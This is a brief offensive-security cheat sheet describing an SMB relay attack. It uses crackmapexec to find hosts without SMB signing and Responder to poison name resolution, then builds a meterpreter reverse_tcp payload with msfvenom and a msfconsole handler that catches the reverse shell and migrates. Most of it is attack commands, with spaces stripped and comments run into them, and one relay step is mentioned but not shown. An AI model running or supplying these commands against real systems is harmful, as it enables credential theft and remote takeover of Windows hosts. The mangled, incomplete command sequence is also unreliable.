# Change the IP range for your targetcrackmapexecsmb10.0.0.0/24--gen-relay-list/tmp/targets.txt
Check the SMB signing requirement. You should look for a host with 445 port open and Message signing enabled but not required or Message signing is disabled.
Start Responder. Ensure you disable SMB server and HTTP server on conf.
# Ensure you configured the /etc/responder/Responder.conf file to disable SMB server and HTTP server. sudoresponder-Ieth0-PvdDw# For -e option (execute), you will get a reverse shell.Kali> msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.0.208LPORT=80-fexe-orshell.exeKali> sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 10.0.0.208 ;set LPORT 80;run -j"
# then, run Respondersudoresponder-Ieth0-PvdDw